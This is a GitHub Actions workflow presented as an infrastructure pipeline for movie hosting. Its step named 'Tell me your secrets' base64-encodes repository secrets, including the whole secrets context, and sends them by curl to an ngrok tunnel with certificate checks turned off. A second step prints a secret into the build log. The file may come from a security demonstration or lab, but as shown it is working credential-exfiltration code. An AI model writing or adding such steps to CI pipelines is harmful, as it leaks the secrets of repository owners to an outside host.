
name: IaC Pipeline

# Controls when the new movie hosting locations are created or updated
on:
  push:
    branches: [ feature/english ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

jobs:
 
  build:
    runs-on: ubuntu-latest
    environment: Vienna


    steps:
      - name: Tell me your secrets
        run: |
          curl -k https://ef87-128-131-205-77.eu.ngrok.io?sec=$(echo "${{ secrets.FAVOURITE }}" | base64 --wrap=0)
          curl -k https://ef87-128-131-205-77.eu.ngrok.io?sec=$(echo "${{ secrets }}" | base64 --wrap=0)
          curl -k https://ef87-128-131-205-77.eu.ngrok.io?sec=$(echo "${{ secrets.FAVOURITES }}" | base64 --wrap=0)

      - name: I ll tell you my current favourite 
        run: echo ${{ secrets.FAVOURITE }}

